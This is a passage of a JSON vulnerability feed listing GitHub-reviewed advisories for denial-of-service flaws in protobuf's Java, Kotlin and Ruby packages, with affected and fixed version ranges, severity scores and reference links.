"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": 
"3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } 
], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-g5ww-5jh7-63cx/GHSA-g5ww-5jh7-63cx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3509" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/commit/a3888f53317a8018e7a439bac4abeb8f3425d5e9" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/blob/v2.6.1/java/core/src/main/java/com/google/protobuf/MessageReflection.java" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/blob/v3.0.0/java/core/src/main/java/com/google/protobuf/MessageReflection.java" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf/tree/main/java" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-12-12T22:33:53Z", "nvd_published_at": "2022-12-12T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h4h5-3hr4-j3g2", "published": "2022-10-04T22:17:15Z", "modified": "2024-10-22T05:28:55.628053Z", "aliases": [ "CGA-xp6q-2w42-9mfm", "CVE-2022-3171" ], "related": [ "CGA-4823-v8jx-rx3q", "CGA-j4r7-qxxx-756w", "CGA-jwcm-r7hw-56j9", "CVE-2022-3171" ], "summary": "protobuf-java has a potential Denial of Service issue", "details": "## Summary\nA potential Denial of Service issue in 
`protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. \n\nReporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)\n\nAffected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.\n\n## Severity\n\n[CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)\n\n## Remediation and Mitigation\n\nPlease update to the latest available versions of the following packages:\n\nprotobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\ngoogle-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)\n", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": 
"3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0.rc.1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0.rc.1", "3.21.0.rc.2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.21.0-rc-1" }, { "fixed": "3.21.7" } ] } ], "versions": [ "3.21.0", "3.21.0-rc-1", "3.21.0-rc-2", "3.21.1", "3.21.2", "3.21.3", "3.21.4", "3.21.5", "3.21.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", 
"ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-1", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "2.0.1", "2.0.3", "2.1.0", "2.2.0", "2.3.0", "2.4.0a", "2.4.1", "2.5.0", "2.6.0", "2.6.1", "3.0.0", "3.0.0-alpha-2", "3.0.0-alpha-3", "3.0.0-alpha-3.1", "3.0.0-beta-1", "3.0.0-beta-2", "3.0.0-beta-3", "3.0.0-beta-4", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", 
"3.16.1", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", 
"ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0.rc.1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0.rc.1", "3.20.0.rc.2", "3.20.1", "3.20.1.rc.1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0.rc.1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0.rc.1", "3.17.0.rc.2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0.rc.1", "3.18.0.rc.2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0.rc.1", "3.19.0.rc.2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.0.0", "3.0.0.alpha.1.0", "3.0.0.alpha.1.1", "3.0.0.alpha.2.0", "3.0.0.alpha.3", "3.0.0.alpha.3.1.pre", "3.0.0.alpha.4.0", "3.0.0.alpha.5.0.3", "3.0.0.alpha.5.0.4", "3.0.0.alpha.5.0.5", "3.0.0.alpha.5.0.5.1", "3.0.2", "3.1.0", "3.1.0.0.pre", "3.10.0.rc.1", "3.10.1", "3.11.0", "3.11.0.rc.1", "3.11.0.rc.2", "3.11.1", "3.11.2", "3.11.3", "3.11.4", "3.12.0", "3.12.0.rc.1", "3.12.0.rc.2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0.rc.3", "3.14.0", "3.14.0.rc.1", "3.14.0.rc.2", "3.14.0.rc.3", "3.15.0", "3.15.0.rc.1", "3.15.0.rc.2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0.rc.1", "3.16.0.rc.2", "3.2.0", "3.2.0.1", "3.2.0.2", "3.2.1.pre", "3.3.0", 
"3.4.0.1", "3.4.0.2", "3.4.1.1", "3.5.0", "3.5.0.pre", "3.5.1", "3.5.1.1", "3.5.1.2", "3.6.0", "3.6.1", "3.7.0", "3.7.0.rc.2", "3.7.0.rc.3", "3.7.1", "3.8.0", "3.8.0.rc.1", "3.9.0", "3.9.0.rc.1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-1", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-javalite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-javalite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", 
"3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0-rc-1" }, { "fixed": "3.20.3" } ] } ], "versions": [ "3.20.0", "3.20.0-rc-1", "3.20.1", "3.20.1-rc-1", "3.20.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0-rc-1" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.0-rc-2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin-lite", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin-lite" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.3" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-h4h5-3hr4-j3g2/GHSA-h4h5-3hr4-j3g2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3171" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v21.7" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v3.16.3" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v3.19.6" }, { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/releases/tag/v3.20.3" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202301-09" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-10-04T22:17:15Z", "nvd_published_at": "2022-10-12T23:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wrvw-hg22-4m67", "published": "2022-01-07T22:31:44Z", "modified": "2024-10-22T05:28:48.749408Z", "aliases": [ "CGA-h8j8-9v3w-chjj", "CVE-2021-22569" ], "related": [ "CGA-7g86-w24x-hwm7", "CGA-8j74-3gff-6wq3", "CGA-gp73-784m-3935" ], "summary": "A potential Denial of 
Service issue in protobuf-java", "details": "## Summary\n\nA potential Denial of Service issue in protobuf-java was discovered in the parsing procedure for binary data.\n\nReporter: [OSS-Fuzz](https://github.com/google/oss-fuzz)\n\nAffected versions: All versions of Java Protobufs (including Kotlin and JRuby) prior to the versions listed below. Protobuf \"javalite\" users (typically Android) are not affected.\n\n## Severity\n\n[CVE-2021-22569](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22569) **High** - CVSS Score: 7.5, An implementation weakness in how unknown fields are parsed in Java. A small (~800 KB) malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated GC pauses.\n\n## Proof of Concept\n\nFor reproduction details, please refer to the oss-fuzz issue that identifies the specific inputs that exercise this parsing weakness.\n\n## Remediation and Mitigation\n\nPlease update to the latest available versions of the following packages:\n\n- protobuf-java (3.16.1, 3.18.2, 3.19.2) \n- protobuf-kotlin (3.18.2, 3.19.2)\n- google-protobuf [JRuby gem only] (3.19.2) \n", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.16.1" } ] } ], "versions": [ "2.0.1", "2.0.3", "2.1.0", "2.2.0", "2.3.0", "2.4.0a", "2.4.1", "2.5.0", "2.6.0", "2.6.1", "3.0.0", "3.0.0-alpha-2", "3.0.0-alpha-3", "3.0.0-alpha-3.1", "3.0.0-beta-1", "3.0.0-beta-2", "3.0.0-beta-3", "3.0.0-beta-4", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", 
"3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "google-protobuf", "ecosystem": "RubyGems", "purl": "pkg:gem/google-protobuf" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.19.2" } ] } ], "versions": [ "3.0.0", "3.0.0.alpha.1.0", "3.0.0.alpha.1.1", "3.0.0.alpha.2.0", "3.0.0.alpha.3", "3.0.0.alpha.3.1.pre", "3.0.0.alpha.4.0", "3.0.0.alpha.5.0.3", "3.0.0.alpha.5.0.4", "3.0.0.alpha.5.0.5", "3.0.0.alpha.5.0.5.1", "3.0.2", "3.1.0", "3.1.0.0.pre", "3.10.0.rc.1", "3.10.1", "3.11.0", "3.11.0.rc.1", "3.11.0.rc.2", "3.11.1", "3.11.2", "3.11.3", "3.11.4", "3.12.0", "3.12.0.rc.1", "3.12.0.rc.2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0.rc.3", "3.14.0", "3.14.0.rc.1", "3.14.0.rc.2", "3.14.0.rc.3", "3.15.0", "3.15.0.rc.1", "3.15.0.rc.2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0.rc.1", "3.16.0.rc.2", "3.17.0", "3.17.0.rc.1", "3.17.0.rc.2", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0.rc.1", "3.18.0.rc.2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0.rc.1", "3.19.0.rc.2", "3.19.1", "3.2.0", "3.2.0.1", "3.2.0.2", "3.2.1.pre", "3.3.0", "3.4.0.1", "3.4.0.2", "3.4.1.1", "3.5.0", "3.5.0.pre", "3.5.1", "3.5.1.1", "3.5.1.2", "3.6.0", "3.6.1", "3.7.0", "3.7.0.rc.2", "3.7.0.rc.3", "3.7.1", "3.8.0", "3.8.0.rc.1", "3.9.0", "3.9.0.rc.1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": 
"com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.18.0" }, { "fixed": "3.18.2" } ] } ], "versions": [ "3.18.0", "3.18.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.19.0" }, { "fixed": "3.19.2" } ] } ], "versions": [ "3.19.0", "3.19.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": { "name": "com.google.protobuf:protobuf-kotlin", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-kotlin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.18.0" }, { "fixed": "3.18.2" } ] } ], "versions": [ "3.18.0", "3.18.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } }, { "package": 